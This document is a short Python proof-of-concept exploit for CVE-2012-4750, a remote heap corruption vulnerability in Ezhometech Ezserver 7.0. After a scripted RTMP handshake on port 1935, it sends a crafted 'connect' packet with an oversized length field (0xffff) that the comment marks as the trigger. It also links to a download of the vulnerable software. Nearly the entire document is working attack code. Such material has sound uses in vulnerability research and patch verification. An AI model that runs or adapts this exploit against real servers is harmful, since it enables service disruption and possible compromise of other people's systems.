Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerabilit

1. #Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerability POC code
2. #Author: Lorenzo Cantoni
3. #CVE: CVE-2012-4750
4. #Link to vulnerable software: http://www.4shared.com/zip/eVs9I2Gf/ezserver70001_win.html
5.  
6. from socket import *
7. import sys
8. import os
9. import time
10.  
11. version = "\x03"
12. zero_pad="\x00" * 4
13.  
14. c1_finger= "\x05\xaf\x52\x83\x0b\xd2\x11\xa5\x48\x88\x94\xcc\x0b\x05\x22\x55\x04\x87\x11\xcd\x19\x85\x10\xa9\xe9\x43\xbf\x8b\x83\x91\x98\x45\x5f\xbd\x41\x07\x30\x05\xd3\x03\x99\x0b\x88\xd9\xb6\x36\x56\xd4\x3c\xfe\xc8\xed\x83\x74\x8f\x4b\x0f\x0f\xc5\x12\x02\x16\x79\x4b\x22\xa0\x54\xe5\xbc\x58\xab\xd8\xc4\x10\x96\x07\x08\x84\x39\x34\x53\xce\x50\x96\x94\xaf\xbe\xab\xe0"
15.  
16. c1 = os.urandom(1537 - len(version+ zero_pad+c1_finger))
17.  
18. c0c1 = version + zero_pad + c1 + c1_finger
19.  
20.  
21. if len(sys.argv) >=2:
22. server = sys.argv[1]
23. else:
24. server ="192.168.1.65"
25.  
26.  
27. s = socket(AF_INET, SOCK_STREAM)
28.  
29. s.connect((server,1935))
30.  
31. # Handshake C0+C1 (sent by client)
32.  
33. s.send(c0c1)
34. time.sleep(2)
35.  
36. # Handshake S0+S1+S2 (sent by server)
37. s0s1s2= s.recv(1700)
38. time.sleep(2)
39. # Handshake C2
40. #parse the payload which has to be echoed back to the server
41. echo = s0s1s2[1:1537]
42.  
43. c2 = echo
44. s.send(c2)
45. time.sleep(2)
46.  
47. # connect('live')
48. size = '\x00\x00\x79'
49. header = '\x03\x00\x00\x00' + size +'\x14\x00\x00\x00\x00'
50. size_2 = '\xff\xff' # TRIGGERS THE VULNERABILITY - legit size: \x00\x07
51. body_0 = '\x02' + size_2
52. req = '\x63\x6f\x6e\x6e\x65\x63\x74' # connect
53. body_1 = '\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x03\x00\x03\x61\x70\x70\x02\x00\x04'
54. param = '\x6c\x69\x76\x65' #live
55. body_2 = '\x00\x08\x66\x6c\x61\x73\x68\x56\x65\x72\x02\x00\x0d\x4c\x4e\x58\x20\x39\x2c\x30\x2c\x31\x32\x34\x2c\x32\x00\x05\x74\x63\x55\x72\x6c\x02\x00\x1d'
56. url = 'rtmp://' + str(sys.argv[1]) + ':1935/live'
57. body_3 = '\x00\x04\x66\x70\x61\x64\x01\x00\x00\x0c\x63\x61\x70\x61\x62\x69\x6c\x69\x74\x69\x65\x73\x00\x40\x2e\x00\x00\x00\x00\x00\x00\xc3\x00\x0b\x61\x75\x64\x69\x6f\x43\x6f\x64\x65\x63\x73\x00\x40\x99\x9c\x00\x00\x00\x00\x00\x00\x0b\x76\x69\x64\x65\x6f\x43\x6f\x64\x65\x63\x73\x00\x40\x6f\x80\x00\x00\x00\x00\x00\x00\x0d\x76\x69\x64\x65\x6f\x46\x75\x6e\x63\x74\x69\x6f\x6e\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x09'
58.  
59. conn_live = header+ body_0 + req + body_1 + param + body_2 + url + body_3
60.  
61. s.send(conn_live)